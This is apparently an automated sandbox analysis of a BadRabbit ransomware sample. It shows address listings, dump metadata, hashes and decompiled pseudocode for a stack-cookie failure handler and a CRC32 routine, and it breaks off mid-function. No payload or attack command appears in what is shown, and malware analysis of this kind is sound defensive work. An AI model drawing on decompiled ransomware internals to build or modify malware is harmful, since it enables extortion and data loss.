                                                                                                                                                  0x000d26aa
                                                                                                                                                  0x000d26ac
                                                                                                                                                  0x000d26ad
                                                                                                                                                  0x000d26b0
                                                                                                                                                  0x000d26b3
                                                                                                                                                  0x000d26b9
                                                                                                                                                  0x000d26bb
                                                                                                                                                  0x000d26be
                                                                                                                                                  0x000d26c0
                                                                                                                                                  0x000d26c3
                                                                                                                                                  0x000d26c6
                                                                                                                                                  0x000d26cb
                                                                                                                                                  0x000d26ce
                                                                                                                                                  0x000d26cf
                                                                                                                                                  0x000d26d2
                                                                                                                                                  0x000d26d5
                                                                                                                                                  0x000d26d7
                                                                                                                                                  0x000d26dd
                                                                                                                                                  0x000d26e0
                                                                                                                                                  0x000d26e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d26e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27d7
                                                                                                                                                  0x000d27d7
                                                                                                                                                  0x000d27da
                                                                                                                                                  0x000d27dc
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x000d27de
                                                                                                                                                  0x000d27e0
                                                                                                                                                  0x000d2811
                                                                                                                                                  0x000d2811
                                                                                                                                                  0x000d2813
                                                                                                                                                  0x000d2815
                                                                                                                                                  0x000d2816
                                                                                                                                                  0x000d281b
                                                                                                                                                  0x000d281c
                                                                                                                                                  0x000d281e
                                                                                                                                                  0x000d2820
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2829
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2829
                                                                                                                                                  0x000d27e2
                                                                                                                                                  0x000d27e5
                                                                                                                                                  0x000d27e5
                                                                                                                                                  0x000d27e8
                                                                                                                                                  0x000d27ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27f0
                                                                                                                                                  0x000d27f4
                                                                                                                                                  0x000d27f7
                                                                                                                                                  0x000d27f9
                                                                                                                                                  0x000d27fb
                                                                                                                                                  0x000d27fe
                                                                                                                                                  0x000d2801
                                                                                                                                                  0x000d2803
                                                                                                                                                  0x000d2806
                                                                                                                                                  0x000d2807
                                                                                                                                                  0x000d280a
                                                                                                                                                  0x000d280d
                                                                                                                                                  0x000d280f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d280f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2832
                                                                                                                                                  0x000d2832
                                                                                                                                                  0x000d2835
                                                                                                                                                  0x000d2837
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d283d
                                                                                                                                                  0x000d2840
                                                                                                                                                  0x000d2842
                                                                                                                                                  0x000d2845
                                                                                                                                                  0x000d2847
                                                                                                                                                  0x000d2888
                                                                                                                                                  0x000d288b
                                                                                                                                                  0x000d288b
                                                                                                                                                  0x000d288d
                                                                                                                                                  0x000d2890
                                                                                                                                                  0x000d2893
                                                                                                                                                  0x000d2893
                                                                                                                                                  0x000d2895
                                                                                                                                                  0x000d2895
                                                                                                                                                  0x000d2898
                                                                                                                                                  0x000d289a
                                                                                                                                                  0x000d289d
                                                                                                                                                  0x000d289f
                                                                                                                                                  0x000d28a1
                                                                                                                                                  0x000d28a4
                                                                                                                                                  0x000d28a7
                                                                                                                                                  0x000d28aa
                                                                                                                                                  0x000d28ad
                                                                                                                                                  0x000d28ad
                                                                                                                                                  0x000d28af
                                                                                                                                                  0x000d28af
                                                                                                                                                  0x000d28b2
                                                                                                                                                  0x000d28b4
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b8
                                                                                                                                                  0x000d28bb
                                                                                                                                                  0x000d28be
                                                                                                                                                  0x000d28c1
                                                                                                                                                  0x000d28c4
                                                                                                                                                  0x000d28ca
                                                                                                                                                  0x000d28ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28c4
                                                                                                                                                  0x000d2849
                                                                                                                                                  0x000d284b
                                                                                                                                                  0x000d284e
                                                                                                                                                  0x000d2865
                                                                                                                                                  0x000d2865
                                                                                                                                                  0x000d2868
                                                                                                                                                  0x000d286b
                                                                                                                                                  0x000d2877
                                                                                                                                                  0x000d2879
                                                                                                                                                  0x000d2879
                                                                                                                                                  0x000d286d
                                                                                                                                                  0x000d286d
                                                                                                                                                  0x000d2870
                                                                                                                                                  0x000d2873
                                                                                                                                                  0x000d2873
                                                                                                                                                  0x000d287c
                                                                                                                                                  0x000d287f
                                                                                                                                                  0x000d2882
                                                                                                                                                  0x000d2884
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2886
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2886
                                                                                                                                                  0x000d2884
                                                                                                                                                  0x000d2850
                                                                                                                                                  0x000d2857
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2859
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28d5
                                                                                                                                                  0x000d28d9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28df
                                                                                                                                                  0x000d28e2
                                                                                                                                                  0x000d28e5
                                                                                                                                                  0x000d28e8
                                                                                                                                                  0x000d28eb
                                                                                                                                                  0x000d28ed
                                                                                                                                                  0x000d28f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28fb
                                                                                                                                                  0x000d28ff
                                                                                                                                                  0x000d2900
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29c8
                                                                                                                                                  0x000d29ca
                                                                                                                                                  0x000d29cd
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x000d29cf
                                                                                                                                                  0x000d29d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29d4
                                                                                                                                                  0x000d29d7
                                                                                                                                                  0x000d2a07
                                                                                                                                                  0x000d2a07
                                                                                                                                                  0x000d2a0a
                                                                                                                                                  0x000d2a39
                                                                                                                                                  0x000d2a3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a3c
                                                                                                                                                  0x000d2a0c
                                                                                                                                                  0x000d1899
                                                                                                                                                  0x000d1899
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x000d29d9
                                                                                                                                                  0x000d29dc
                                                                                                                                                  0x000d29dc
                                                                                                                                                  0x000d29de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29e0
                                                                                                                                                  0x000d29e4
                                                                                                                                                  0x000d29e7
                                                                                                                                                  0x000d29e9
                                                                                                                                                  0x000d29eb
                                                                                                                                                  0x000d29ee
                                                                                                                                                  0x000d29f1
                                                                                                                                                  0x000d29f3
                                                                                                                                                  0x000d29f6
                                                                                                                                                  0x000d29f7
                                                                                                                                                  0x000d29fa
                                                                                                                                                  0x000d29fd
                                                                                                                                                  0x000d2a00
                                                                                                                                                  0x000d2a03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a44
                                                                                                                                                  0x000d2a44
                                                                                                                                                  0x000d2a46
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a49
                                                                                                                                                  0x000d2a4b
                                                                                                                                                  0x000d2a4c
                                                                                                                                                  0x000d2a4c
                                                                                                                                                  0x000d2a4f
                                                                                                                                                  0x000d2a4f
                                                                                                                                                  0x000d2a52
                                                                                                                                                  0x000d2a52
                                                                                                                                                  0x000d2a5b
                                                                                                                                                  0x000d2a61
                                                                                                                                                  0x000d2a64
                                                                                                                                                  0x000d2a66
                                                                                                                                                  0x000d2a6b
                                                                                                                                                  0x000d2a6e
                                                                                                                                                  0x000d2a71
                                                                                                                                                  0x000d2a74
                                                                                                                                                  0x000d2a77
                                                                                                                                                  0x000d2a7a
                                                                                                                                                  0x000d2a91
                                                                                                                                                  0x000d2a9b
                                                                                                                                                  0x000d2aa3
                                                                                                                                                  0x000d2aa5
                                                                                                                                                  0x000d2ab4
                                                                                                                                                  0x000d2ab4
                                                                                                                                                  0x000d2ab6
                                                                                                                                                  0x000d2ab9
                                                                                                                                                  0x000d2abc
                                                                                                                                                  0x000d2abf
                                                                                                                                                  0x000d2ac2
                                                                                                                                                  0x000d2ac5
                                                                                                                                                  0x000d2ac8
                                                                                                                                                  0x000d2acb
                                                                                                                                                  0x000d2ace
                                                                                                                                                  0x000d2ad0
                                                                                                                                                  0x000d2ad2
                                                                                                                                                  0x000d2ad7
                                                                                                                                                  0x000d2ada
                                                                                                                                                  0x000d2adb
                                                                                                                                                  0x000d2ade
                                                                                                                                                  0x000d2ae1
                                                                                                                                                  0x000d2aea
                                                                                                                                                  0x000d2ae3
                                                                                                                                                  0x000d2ae3
                                                                                                                                                  0x000d2ae3
                                                                                                                                                  0x000d2aef
                                                                                                                                                  0x000d2af2
                                                                                                                                                  0x000d2af2
                                                                                                                                                  0x000d2af4
                                                                                                                                                  0x000d2af4
                                                                                                                                                  0x000d2ad2
                                                                                                                                                  0x000d2af7
                                                                                                                                                  0x000d2afa
                                                                                                                                                  0x000d2b01
                                                                                                                                                  0x000d2b01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2afc
                                                                                                                                                  0x000d2afc
                                                                                                                                                  0x000d2aff
                                                                                                                                                  0x000d2b06
                                                                                                                                                  0x000d2b0b
                                                                                                                                                  0x000d2b12
                                                                                                                                                  0x000d2b19
                                                                                                                                                  0x000d2b1c
                                                                                                                                                  0x000d2b22
                                                                                                                                                  0x000d2b24
                                                                                                                                                  0x000d2b27
                                                                                                                                                  0x000d2b2d
                                                                                                                                                  0x000d2b2f
                                                                                                                                                  0x000d2b35
                                                                                                                                                  0x000d2b35
                                                                                                                                                  0x000d2b39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2b4b
                                                                                                                                                  0x000d2b3b
                                                                                                                                                  0x000d2b3b
                                                                                                                                                  0x000d2b3e
                                                                                                                                                  0x000d2b40
                                                                                                                                                  0x000d2b42
                                                                                                                                                  0x000d2b43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2b43
                                                                                                                                                  0x000d2b31
                                                                                                                                                  0x000d2b33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2b33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2aff
                                                                                                                                                  0x000d2afa
                                                                                                                                                  0x000d2aa7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2aa7
                                                                                                                                                  0x000d2a7c
                                                                                                                                                  0x000d2a7f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a81
                                                                                                                                                  0x000d2a84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a86
                                                                                                                                                  0x000d2a89
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a8b
                                                                                                                                                  0x000d2a8f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2aad
                                                                                                                                                  0x000d2aad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dc5
                                                                                                                                                  0x000d1dc5
                                                                                                                                                  0x000d1dc7
                                                                                                                                                  0x000d17be
                                                                                                                                                  0x000d17b5

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: header crc mismatch$unknown compression method$xI
                                                                                                                                                  • API String ID: 0-3638764456
                                                                                                                                                  • Opcode ID: 3c305045cd47ec95800d450ed6e2a982376ff6e9911c054b4e9e59658754b342
                                                                                                                                                  • Instruction ID: 5e85d325ef7398f2bf1ec53ed4c629bd5f6f2ad5386ebe95657bdfde22ddaa7f
                                                                                                                                                  • Opcode Fuzzy Hash: 3c305045cd47ec95800d450ed6e2a982376ff6e9911c054b4e9e59658754b342
                                                                                                                                                  • Instruction Fuzzy Hash: 89423970A00305EFDF68CF59C4946AEBBF2EF98300F1485AAD8559B356DB74DA41CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                  			E000D1499(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                  				void* _v804;
                                                                                                                                                  				intOrPtr _v808;
                                                                                                                                                  				intOrPtr _v812;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  
                                                                                                                                                  				if(__ecx !=  *0xd8000) {
                                                                                                                                                  					 *0xd8120 = __eax;
                                                                                                                                                  					 *0xd811c = __ecx;
                                                                                                                                                  					 *0xd8118 = __edx;
                                                                                                                                                  					 *0xd8114 = __ebx;
                                                                                                                                                  					 *0xd8110 = __esi;
                                                                                                                                                  					 *0xd810c = __edi;
                                                                                                                                                  					 *0xd8138 = ss;
                                                                                                                                                  					 *0xd812c = cs;
                                                                                                                                                  					 *0xd8108 = ds;
                                                                                                                                                  					 *0xd8104 = es;
                                                                                                                                                  					 *0xd8100 = fs;
                                                                                                                                                  					 *0xd80fc = gs;
                                                                                                                                                  					asm("pushfd");
                                                                                                                                                  					_pop( *0xd8130);
                                                                                                                                                  					 *0xd8124 =  *_t25;
                                                                                                                                                  					 *0xd8128 = _v0;
                                                                                                                                                  					 *0xd8134 =  &_a4;
                                                                                                                                                  					 *0xd8070 = 0x10001;
                                                                                                                                                  					 *0xd802c =  *0xd8128;
                                                                                                                                                  					 *0xd8020 = 0xc0000409;
                                                                                                                                                  					 *0xd8024 = 1;
                                                                                                                                                  					_v812 =  *0xd8000;
                                                                                                                                                  					_v808 =  *0xd8004;
                                                                                                                                                  					SetUnhandledExceptionFilter(0);
                                                                                                                                                  					__imp__UnhandledExcep(0xd4080);
                                                                                                                                                  					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                  				} else {
                                                                                                                                                  					return __eax;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x000d149f
                                                                                                                                                  0x000d14b4
                                                                                                                                                  0x000d14b9
                                                                                                                                                  0x000d14bf
                                                                                                                                                  0x000d14c5
                                                                                                                                                  0x000d14cb
                                                                                                                                                  0x000d14d1
                                                                                                                                                  0x000d14d7
                                                                                                                                                  0x000d14de
                                                                                                                                                  0x000d14e5
                                                                                                                                                  0x000d14ec
                                                                                                                                                  0x000d14f3
                                                                                                                                                  0x000d14fa
                                                                                                                                                  0x000d1501
                                                                                                                                                  0x000d1502
                                                                                                                                                  0x000d150b
                                                                                                                                                  0x000d1513
                                                                                                                                                  0x000d151b
                                                                                                                                                  0x000d1526
                                                                                                                                                  0x000d1535
                                                                                                                                                  0x000d153a
                                                                                                                                                  0x000d1544
                                                                                                                                                  0x000d1553
                                                                                                                                                  0x000d155e
                                                                                                                                                  0x000d1566
                                                                                                                                                  0x000d1571
                                                                                                                                                  0x000d158a
                                                                                                                                                  0x000d14a1
                                                                                                                                                  0x000d14a1
                                                                                                                                                  0x000d14a1

                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000D1566
                                                                                                                                                  • UnhandledExcep.KERNEL32(000D4080), ref: 000D1571
                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 000D157C
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 000D1583
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1999905405-0
                                                                                                                                                  • Opcode ID: 6e739c4a5c4aa3379f326d2f0695433d4745dd013385d92095addf99202825ea
                                                                                                                                                  • Instruction ID: 0e8af22682a79536217165c4300bd5a6c53894fc6693a021dd3428881e2ec101
                                                                                                                                                  • Opcode Fuzzy Hash: 6e739c4a5c4aa3379f326d2f0695433d4745dd013385d92095addf99202825ea
                                                                                                                                                  • Instruction Fuzzy Hash: 66216FB9912314DBE380DF69FD49A447BA8BB18314B10C01BEE4887360EB78558A8F79
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E000D30E3(signed int _a4, signed char _a8, unsigned int _a12) {
                                                                                                                                                  				signed int _t161;
                                                                                                                                                  				signed char _t164;
                                                                                                                                                  				signed char _t189;
                                                                                                                                                  				signed int _t222;
                                                                                                                                                  				unsigned int _t224;
                                                                                                                                                  				unsigned int _t248;
                                                                                                                                                  				signed char* _t249;
                                                                                                                                                  				signed int* _t250;
                                                                                                                                                  				signed int _t251;
                                                                                                                                                  
                                                                                                                                                  				_t189 = _a8;
                                                                                                                                                  				_t222 = 0xff;
                                                                                                                                                  				_t248 = _a12;
                                                                                                                                                  				_t161 =  !_a4;
                                                                                                                                                  				_t251 = _t248;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_a8 = _t189;
                                                                                                                                                  					if(_t251 == 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t251 = _t189 & 0x00000003;
                                                                                                                                                  					if(_t251 != 0) {
                                                                                                                                                  						_t161 = _t161 >> 0x00000008 ^  *(0xd4b18 + (( *_t189 & 0x000000ff ^ _t161) & _t222) * 4);
                                                                                                                                                  						_t189 = _t189 + 1;
                                                                                                                                                  						_t248 = _t248 - 1;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t248 < 0x20) {
                                                                                                                                                  					_t249 = _a8;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a4 = _t248 >> 5;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t165 = _t161 ^  *_t189;
                                                                                                                                                  						_a8 = _t189 + 4;
                                                                                                                                                  						_t250 = _a8;
                                                                                                                                                  						_t241 =  *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t235 >> 0x18) * 4) ^  *(0xd5718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd5318 + (( *(0xd4f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0xd5318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0xd4b18 + (_t165 >> 0x18) * 4) ^  *(0xd5718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t229 >> 0x18) * 4) ^  *(0xd5718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t171 >> 0x18) * 4) ^  *(0xd5718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t235 >> 0x18) * 4) ^  *(0xd5718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd4b18 + (_t177 >> 0x18) * 4) ^  *(0xd5718 + (_t177 & 0x000000ff) * 4) ^ _t250[4];
                                                                                                                                                  						_t248 = _t248 - 0x20;
